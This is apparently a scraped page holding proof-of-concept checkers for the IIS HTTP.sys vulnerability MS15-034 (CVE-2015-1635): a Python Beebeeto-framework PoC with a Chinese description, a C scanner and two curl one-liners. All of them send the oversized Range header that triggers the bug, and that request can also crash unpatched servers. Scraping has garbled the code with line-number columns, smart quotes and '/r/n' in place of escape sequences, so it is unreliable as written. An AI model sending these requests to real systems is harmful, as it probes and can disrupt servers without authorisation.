1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88

#!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import socket
import random
import urlparse
from baseframe import BaseFrame

class MyPoc(BaseFrame):
poc_info = {
# poc相关信息
‘poc’: {
‘id’: ‘poc-2015-0081’,
‘name’: ‘IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC’,
‘author’: ‘user1018’,
‘create_date’: ‘2015-04-15’,
},
# 协议相关信息
‘protocol’: {
‘name’: ‘http’,
‘port’: [80],
‘layer4_protocol’: [‘tcp’],
},
# 漏洞相关信息
‘vul’: {
‘app_name’: ‘IIS’,
‘vul_version’: [‘7.0’],
‘type’: ‘Code Execution’,
‘tag’: [‘IIS7.0漏洞’, ‘HTTP.sys漏洞’, ‘CVE-2015-1635’],
‘desc’: ”’
影响范围:
Windows7
Windows8
Windows server 2008
Windows server 2012
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求
时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
若要利用此漏洞，攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理
请求的方式，安装更新可以修复此漏洞。
”’,
‘references’: [‘https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx’,
‘http://bobao.360.cn/news/detail/1435.html’],
},
}

@classmethod
def verify(cls, args):
target = args[‘options’][‘target’]
if urlparse.urlparse(target).netloc == ”:
ipAddr = urlparse.urlparse(target).path
else:
ipAddr = socket.gethostbyname(urlparse.urlparse(target).netloc)
hexAllFfff = "18446744073709551615"
req1 = "GET / HTTP/1.0/r/n/r/n"
req = "GET / HTTP/1.1/r/nHost: stuff/r/nRange: bytes=0-" + hexAllFfff + "/r/n/r/n"
if args[‘options’][‘verbose’]:
print ‘[*] Target: ‘ + ipAddr
print ‘[*] Audit Started’
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
# test ms-iis
if "Microsoft" not in boringResp:
print "[*] Not IIS"
return args
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
print "[+] Looks Vulnerability!"
args[‘success’] = True
args[‘poc_ret’][‘vulnerability’] = ipAddr
elif " The request has an invalid header name" in goodResp:
args[‘poc_ret’][‘error’] = "[*] Looks Patched"
else:
args[‘poc_ret’][‘error’] = "[*] Unexpected response, cannot discern patch status"
return args
exploit = verify
if __name__ == ‘__main__’:
from pprint import pprint
mp = MyPoc()
pprint(mp.run())

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87

/*
UNTESTED – MS15-034 Checker
THE BUG:
8a8b2112 56 push esi
8a8b2113 6a00 push 0
8a8b2115 2bc7 sub eax,edi
8a8b2117 6a01 push 1
8a8b2119 1bca sbb ecx,edx
8a8b211b 51 push ecx
8a8b211c 50 push eax
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here
ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4
BY: john.b.hale@gmai.com
Twitter: @rhcp011235
*/
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <arpa/inet.h>
int connect_to_server(char *ip)
{
int sockfd = 0, n = 0;
struct sockaddr_in serv_addr;
struct hostent *server;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("/n Error : Could not create socket /n");
return 1;
}
memset(&serv_addr, ‘0’, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(80);
if(inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0)
{
printf("/n inet_pton error occured/n");
return 1;
}
if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
{
printf("/n Error : Connect Failed /n");
return 1;
}
return sockfd;
}

int main(int argc, char *argv[])
{
int n = 0;
int sockfd;
char recvBuff[1024];
// Check server
char request[] = "GET / HTTP/1.0/r/n/r/n";
// our evil buffer
char request1[] = "GET / HTTP/1.1/r/nHost: stuff/r/nRange: bytes=0-18446744073709551615/r/n/r/n";

if(argc != 2)
{
printf("/n Usage: %s <ip of server> /n",argv[0]);
return 1;
}
printf("[*] Audit Started/n");
sockfd = connect_to_server(argv[1]);
write(sockfd, request, strlen(request));
read(sockfd, recvBuff, sizeof(recvBuff)-1);
if (!strstr(recvBuff,"Microsoft"))
{
printf("[*] NOT IIS/n");
exit(1);
}
sockfd = connect_to_server(argv[1]);
write(sockfd, request1, strlen(request1));
read(sockfd, recvBuff, sizeof(recvBuff)-1);
if (strstr(recvBuff,"Requested Range Not Satisfiable"))
{
printf("[!!] Looks VULN/n");
exit(1);
} else if(strstr(recvBuff,"The request has an invalid header name")) {
printf("[*] Looks Patched");
} else
printf("[*] Unexpected response, cannot discern patch status");
}

1

curl -i http://xxx.com/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

1

curl http://xxx.com/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"|grep "The requested range is not satisfiable"